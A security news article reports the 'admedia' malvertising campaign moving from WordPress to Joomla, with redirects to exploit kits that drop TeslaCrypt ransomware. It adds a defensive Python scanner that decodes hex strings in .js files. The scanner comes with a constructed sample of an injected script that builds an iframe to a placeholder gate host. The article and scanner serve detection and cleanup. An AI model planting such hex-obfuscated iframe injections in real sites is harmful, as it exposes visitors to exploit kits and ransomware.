Exploit kits infecting thousands of WordPress websites are setting their sights on the open-source content management system Joomla in a new campaign spotted by a researcher at the SANS Institute’s Internet Storm Center.
“The group behind the WordPress ‘admedia’ campaign is now apparently targeting Joomla sites,” said Brad Duncan, security researcher at Rackspace. “We are starting to see the same traffic characteristics in infections that are associated with Joomla sites – as we did with the WordPress campaign,” Duncan said.
Researchers at Heimdal Security reported that visitors to those compromised WordPress sites were redirected to malicious websites hosting the Nuclear Exploit Kit, a collection of exploits targeting Adobe products (Flash, Reader, Acrobat), Internet Explorer and Microsoft Silverlight. Since then, the attacks have shifted and are now delivering the Angler Exploit Kit, according to research by Malwarebytes.
“Exploit kit traffic associated with this campaign has generally sent TeslaCrypt ransomware,” wrote Duncan, who posted his findings on Thursday to the ISC site. TeslaCrypt, like other crypto-ransomware, encrypts files stored on the local hard drive and demands a ransom in exchange for the encryption key.
On Friday, Sucuri confirmed to Threatpost it’s also seeing the malware affecting Joomla sites. “Although the number of infected Joomla sites is smaller by an order of magnitude (so is the market share of Joomla). And in some cases the infected Joomla sites shared the same hosting accounts with WordPress sites,” said Denis Sinegubko, a researcher at Sucuri who first identified the WordPress compromise, in an email.
Linking WordPress Attacks To Joomla
Duncan said the same group is behind both the Angler and Nuclear attacks. In his research, Duncan examined the long string of hexadecimal code that was part of the exploit’s injected script in the .js files. “Translate that string from hex to ASCII, and you’ll find a URL for the admedia gate,” he wrote.
Duncan explains: “Admedia was a common string used in malicious URLs associated with the rogue WordPress iframes. Because of that, some people use the term ‘admedia’ when referring to traffic generated by this campaign. These ‘admedia’ URLs act as a gate between the compromised website and the EK server,” Duncan wrote.
On Wednesday, Duncan documented an Angler EK infection related to this “admedia” campaign on a compromised Joomla site. “I got a full chain of events. The chain started with a compromised website that generated an ‘admedia’ gate. The gate led to Angler EK. Finally, Angler EK delivered TeslaCrypt, and we saw some callback traffic from the malware.”
Sucuri’s Sinegubko believes that the attackers scan for multiple vulnerabilities on WordPress, Joomla and Drupal sites and infect those they can. “Since most versions of the malware don’t depend on any particular CMS (they just infect .js files that can be found in any CMS) they use the vulnerability to break into the server, upload a backdoor and then make it find and infect all .js files,” Sinegubko said.
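The two details above that matter for cleanup, the hex-encoded gate URL Duncan decoded from the injected script and Sinegubko’s point that the backdoor rewrites every .js file it can reach, suggest a simple triage check: walk a CMS docroot, pull long hexadecimal runs out of each .js file, decode them and flag any that turn into a URL carrying the “admedia” marker. The script below is an added example written for this article; it is not code from Duncan, the ISC or Sucuri. The sample script contents and the gate URL (`admedia.example.invalid`) are constructed placeholders, not the campaign’s real indicators, and the 40-hex-character minimum and the `admedia` marker are assumptions chosen for the example.

```python
import re
from pathlib import Path

# The injected scripts carried the gate URL as one long run of hex digits.
# Match even-length runs of at least 40 hex characters (20 bytes) that are not
# embedded in a longer hex run; the length floor is an assumption for this example.
HEX_RUN = re.compile(r"(?<![0-9A-Fa-f])((?:[0-9A-Fa-f]{2}){20,})(?![0-9A-Fa-f])")


def decode_hex_runs(js_text):
    """Return (hex_run, decoded_text) for every long hex run that decodes to printable ASCII.

    Runs that are really hashes or binary data fail the ASCII/printable test
    and are dropped, which keeps legitimate minified code from being flagged.
    """
    results = []
    for match in HEX_RUN.finditer(js_text):
        run = match.group(1)
        try:
            decoded = bytes.fromhex(run).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if decoded.isprintable():
            results.append((run, decoded))
    return results


def find_gate_urls(js_text, marker="admedia"):
    """Decoded strings that look like a URL and contain the campaign marker."""
    return [
        decoded
        for _, decoded in decode_hex_runs(js_text)
        if "://" in decoded and marker in decoded.lower()
    ]


def scan_js_files(root, marker="admedia"):
    """Walk a CMS document root and map each infected .js path to its decoded gate URLs."""
    report = {}
    for path in Path(root).rglob("*.js"):
        try:
            text = path.read_text(errors="ignore")
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        urls = find_gate_urls(text, marker)
        if urls:
            report[str(path)] = urls
    return report


# Constructed sample: a benign script with an injected snippet appended to it.
# The hostname is a placeholder (.invalid TLD), not the real admedia gate.
SAMPLE_URL = "http://admedia.example.invalid/gate.php?id=1"
SAMPLE_JS = (
    "function init(){document.body.className='ready';}\n"
    "var _0x='" + SAMPLE_URL.encode().hex() + "';\n"
    "var f=document.createElement('iframe');f.src=h2a(_0x);\n"
)

if __name__ == "__main__":
    for url in find_gate_urls(SAMPLE_JS):
        print("flagged gate URL:", url)
```

Run `scan_js_files("/path/to/docroot")` against a copy of the site to get a list of files to restore from a clean backup; because the backdoor, not the .js files, is the persistence mechanism, restoring the scripts without removing the backdoor and patching the CMS just invites reinfection.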
According to Sucuri, the peak of WordPress infections (in terms of sites cleaned) was about nine days ago.